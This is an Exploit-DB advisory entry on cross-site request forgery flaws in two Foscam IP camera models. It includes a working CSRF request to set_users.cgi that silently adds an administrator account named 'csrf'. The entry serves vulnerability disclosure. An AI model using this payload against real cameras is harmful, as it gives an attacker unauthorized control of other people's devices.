Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities

EDB-ID:

38437

CVE:

N/A

EDB Verified:

Author:

shekyan

Type:

remote

Exploit: /

Platform:

Hardware

Date:

2013-04-09

Vulnerable App:

source: https://www.securityfocus.com/bid/58943/info

Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities.

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

The following products are vulnerable:

Foscam FI8910W running Embedded Web Interface 2.4.10.3
Foscam FI8908W running Embedded Web Interface 2.4.10.3

http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services